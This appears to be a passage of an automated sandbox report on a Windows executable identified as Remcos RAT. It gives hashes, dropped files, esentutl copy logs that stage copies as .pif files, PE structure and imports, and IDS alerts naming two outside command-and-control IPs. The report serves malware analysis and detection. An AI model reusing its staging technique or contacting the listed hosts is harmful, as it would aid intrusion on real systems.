                                                                          • Filename: C6dAUcOA6M.exe, Detection: malicious, Browse
                                                                          • Filename: 2jbMIxCFsK.exe, Detection: malicious, Browse
                                                                          • Filename: 1m181Ru74o.exe, Detection: malicious, Browse
                                                                          • Filename: jlPBMMQbXC.exe, Detection: malicious, Browse
                                                                          • Filename: qqig1mHX8U.exe, Detection: malicious, Browse
                                                                          • Filename: nft438A5fN.exe, Detection: malicious, Browse
                                                                          • Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious, Browse
                                                                          • Filename: IBKB.vbs, Detection: malicious, Browse
                                                                          • Filename: USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                          C:\Users\Public\xpha.pif

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\esentutl.exe
                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18944
                                                                          Entropy (8bit):5.742964649637377
                                                                          Encrypted:false
                                                                          SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                          MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                          SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                          SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                          SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                          \Device\ConDrv

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\esentutl.exe
                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                          Category:dropped
                                                                          Size (bytes):589
                                                                          Entropy (8bit):4.666389644974742
                                                                          Encrypted:false
                                                                          SSDEEP:12:qb8GAvdxTzQmeSbZ7u0wxDDDDDDDDjCaY5T96aYA996TB8NGNJ:K8GwxTzQmp7u0wQakT96a796t8Nc
                                                                          MD5:DBE57BF0E0A34E98DC2C36FD5B415A93
                                                                          SHA1:8F9C547A8FDF13EA7065459EDB7DF9A24C656EE6
                                                                          SHA-256:D7D88B46ECEC61F15A9CEDCC533BC786068FA7D8F0259549968A8CA527DB8631
                                                                          SHA-512:8D3EFA922CB890180DA7B0D38A90862A397F26D1C296A1240292BA0C26FA85D814BE8C8BC3AAC483176D33B51EDA995728A29A2626AFCE510EC2BE270BEA971B
                                                                          Malicious:false
                                                                          Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\AWkpqJMxci.exe...Destination File: C:\\Users\\Public\\Libraries\\Bzaszylr.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x147000 (1339392) (1 MB)....Total bytes written = 0x147000 (1339392) (1 MB).......Operation completed successfully in 0.94 seconds.....

                                                                          \Device\Null

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\esentutl.exe
                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                          Category:dropped
                                                                          Size (bytes):560
                                                                          Entropy (8bit):4.532578488470501
                                                                          Encrypted:false
                                                                          SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNBG:/p4xT5cp7u0wQakB4aV4t8Nd
                                                                          MD5:4D6C195EBA3736E57EF6A03F1EEEF490
                                                                          SHA1:237210C613550627B46D6D6AB82F396EACA3EA20
                                                                          SHA-256:FF89C20795C881958044CCE205E8EBAE0CC028631ED1E354BEF0AF0C5BD23E3C
                                                                          SHA-512:2E4AC9CDB61DDEFDDEE6378C39282BABFCC457BB896D1B92E07E234BC202D0677FC20BD96FD0102A32B211DB5D47DDB1C8C0A396A481C9696E7CF0DF4959D3A1
                                                                          Malicious:false
                                                                          Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.62 seconds.....

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.186865824174257
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                          • Windows Screen Saver (13104/52) 0.13%
                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          File name:AWkpqJMxci.exe
                                                                          File size:1'339'392 bytes
                                                                          MD5:b4e2055b4877dcfcbf9a366106b15591
                                                                          SHA1:459f7b89e83d5be3581029dca3bb32d4c97d8156
                                                                          SHA256:096394b733ca53e65afa06302776c52330f2567d665a42e0c5463fe23c523e62
                                                                          SHA512:afafada21255956613393e13f8d67b1a4d1da780cad6cedc4bb5c01b3b17863e29e981548959b0790e2f40a2498fb6a04070289c551e2489e652b0e3e0525107
                                                                          SSDEEP:24576:lXcmzpu+0sDG7JD/7YnmDPd037ElJo7gZtnrQ5VlPgemhs2u+/T:lXZpxDfmS3wvo0ZtrQ5VZQhsD+/T
                                                                          TLSH:4B55BFD1EED04BBEC175287498FB826CD81D7F33693BA45666EBB8CC8A35251301186F
                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                          File Icon

                                                                          Icon Hash:2a6b92a2a25c7ca2

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x48089c
                                                                          Entrypoint Section:.itext
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                          DLL Characteristics:
                                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:0f481911497086e6fe44037d9dba03dc

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          add esp, FFFFFFF0h
                                                                          mov eax, 0047EEE8h
                                                                          call 00007F9591439771h
                                                                          mov eax, dword ptr [00526344h]
                                                                          mov eax, dword ptr [eax]
                                                                          call 00007F959148D0D9h
                                                                          mov ecx, dword ptr [005262DCh]
                                                                          mov eax, dword ptr [00526344h]
                                                                          mov eax, dword ptr [eax]
                                                                          mov edx, dword ptr [0047EDC0h]
                                                                          call 00007F959148D0D9h
                                                                          mov eax, dword ptr [00526344h]
                                                                          mov eax, dword ptr [eax]
                                                                          call 00007F959148D14Dh
                                                                          call 00007F959143710Ch
                                                                          lea eax, dword ptr [eax+00h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x12b0000x2738.idata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x13a0000x16c00.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1300000x92fc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x12f0000x18.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x12b7580x618.idata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x7e1800x7e200480059df31c00782ae91e489a7689ed1False0.5099359669226957data6.557120304046401IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .itext0x800000x8e40xa00e97a33970f357c828abe289a33acf875False0.5625data5.899993257593548IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .data0x810000xa55440xa56007e55f2e0831571a45a644894a2835d59False0.5059509046674225data6.882376057695866IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .bss0x1270000x36e80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .idata0x12b0000x27380x2800d002923b21ce5b1cf1e6a8f3c7bde5e7False0.31943359375data5.16090217321333IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .tls0x12e0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rdata0x12f0000x180x2004938957014b3e155444a80ea766d5d23False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x1300000x92fc0x9400df37274b98963e114e8ecffa2b0aeb38False0.567066089527027data6.647145689843035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x13a0000x16c000x16c007db24021d5a267d30d0b857126135700False0.19845681662087913data5.840909842729201IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_CURSOR0x13abb40x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                          RT_CURSOR0x13ace80x134dataEnglishUnited States0.4642857142857143
                                                                          RT_CURSOR0x13ae1c0x134dataEnglishUnited States0.4805194805194805
                                                                          RT_CURSOR0x13af500x134dataEnglishUnited States0.38311688311688313
                                                                          RT_CURSOR0x13b0840x134dataEnglishUnited States0.36038961038961037
                                                                          RT_CURSOR0x13b1b80x134dataEnglishUnited States0.4090909090909091
                                                                          RT_CURSOR0x13b2ec0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                          RT_BITMAP0x13b4200x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                          RT_BITMAP0x13b5f00x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                          RT_BITMAP0x13b7d40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                          RT_BITMAP0x13b9a40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                          RT_BITMAP0x13bb740x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                          RT_BITMAP0x13bd440x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                          RT_BITMAP0x13bf140x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                          RT_BITMAP0x13c0e40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                          RT_BITMAP0x13c2b40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                          RT_BITMAP0x13c4840x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                          RT_BITMAP0x13c6540xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                          RT_ICON0x13c73c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.3550656660412758
                                                                          RT_ICON0x13d7e40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.23599585062240663
                                                                          RT_ICON0x13fd8c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m0.18806093528578177
                                                                          RT_ICON0x143fb40x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m0.12523649358839606
                                                                          RT_DIALOG0x14d45c0x52data0.7682926829268293
                                                                          RT_DIALOG0x14d4b00x52data0.7560975609756098
                                                                          RT_STRING0x14d5040x438data0.40925925925925927
                                                                          RT_STRING0x14d93c0x4b0data0.335
                                                                          RT_STRING0x14ddec0x3bcdata0.301255230125523
                                                                          RT_STRING0x14e1a80x290data0.4817073170731707
                                                                          RT_STRING0x14e4380xc0data0.6770833333333334
                                                                          RT_STRING0x14e4f80xecdata0.6483050847457628
                                                                          RT_STRING0x14e5e40x350data0.43514150943396224
                                                                          RT_STRING0x14e9340x3ccdata0.37962962962962965
                                                                          RT_STRING0x14ed000x388data0.4092920353982301
                                                                          RT_STRING0x14f0880x3acdata0.3191489361702128
                                                                          RT_STRING0x14f4340x230data0.4875
                                                                          RT_STRING0x14f6640xccdata0.6225490196078431
                                                                          RT_STRING0x14f7300x1bcdata0.5292792792792793
                                                                          RT_STRING0x14f8ec0x3ccdata0.3683127572016461
                                                                          RT_STRING0x14fcb80x3d4data0.36428571428571427
                                                                          RT_STRING0x15008c0x2ecdata0.37566844919786097
                                                                          RT_STRING0x1503780x308data0.3427835051546392
                                                                          RT_RCDATA0x1506800x10data1.5
                                                                          RT_RCDATA0x1506900x378data0.6813063063063063
                                                                          RT_RCDATA0x150a080x82Delphi compiled form 'TDataModule3'0.7769230769230769
                                                                          RT_GROUP_CURSOR0x150a8c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                          RT_GROUP_CURSOR0x150aa00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                          RT_GROUP_CURSOR0x150ab40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                          RT_GROUP_CURSOR0x150ac80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                          RT_GROUP_CURSOR0x150adc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                          RT_GROUP_CURSOR0x150af00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                          RT_GROUP_CURSOR0x150b040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                          RT_GROUP_ICON0x150b180x3edata0.8709677419354839

                                                                          Imports

                                                                          DLLImport
                                                                          oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                          user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                          kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                          kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                          user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharNextW, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                          gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                          version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                          kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringW, CompareStringA, CloseHandle
                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                          oleaut32.dllGetErrorInfo, GetActiveObject, SysFreeString
                                                                          ole32.dllCoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                                                                          kernel32.dllSleep
                                                                          oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                          comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-11-26T08:24:03.271330+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731142.250.181.33443TCP
                                                                          2024-11-26T08:24:12.618349+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449732162.216.243.152404TCP
                                                                          2024-11-26T08:24:15.182174+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449733192.169.69.262500TCP
                                                                          2024-11-26T08:24:27.160184+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449740162.216.243.152404TCP
                                                                          2024-11-26T08:24:29.405914+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449741192.169.69.262500TCP
                                                                          2024-11-26T08:24:41.026788+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449742162.216.243.152404TCP
                                                                          2024-11-26T08:24:43.259234+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449743192.169.69.262500TCP
                                                                          2024-11-26T08:24:54.918541+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449744162.216.243.152404TCP
                                                                          2024-11-26T08:24:57.172177+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449745192.169.69.262500TCP
                                                                          2024-11-26T08:25:08.776100+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449763162.216.243.152404TCP
                                                                          2024-11-26T08:25:11.009478+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449769192.169.69.262500TCP
                                                                          2024-11-26T08:25:23.036101+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449800162.216.243.152404TCP
                                                                          2024-11-26T08:25:25.636529+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449806192.169.69.262500TCP
                                                                          2024-11-26T08:25:37.386560+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449831162.216.243.152404TCP
                                                                          2024-11-26T08:25:39.625415+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449837192.169.69.262500TCP
                                                                          2024-11-26T08:25:51.267856+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449862162.216.243.152404TCP
                                                                          2024-11-26T08:25:53.502242+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449868192.169.69.262500TCP
                                                                          2024-11-26T08:26:05.104315+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449894162.216.243.152404TCP
                                                                          2024-11-26T08:26:07.313945+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449900192.169.69.262500TCP
                                                                          2024-11-26T08:26:19.010690+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449927162.216.243.152404TCP
                                                                          2024-11-26T08:26:21.204631+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449933192.169.69.262500TCP
                                                                          2024-11-26T08:26:33.321104+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449961162.216.243.152404TCP
                                                                          2024-11-26T08:26:35.870577+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449967192.169.69.262500TCP
                                                                          2024-11-26T08:26:47.667527+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449994162.216.243.152404TCP
                                                                          2024-11-26T08:26:49.949304+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450001192.169.69.262500TCP
                                                                          2024-11-26T08:27:01.572309+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450027162.216.243.152404TCP
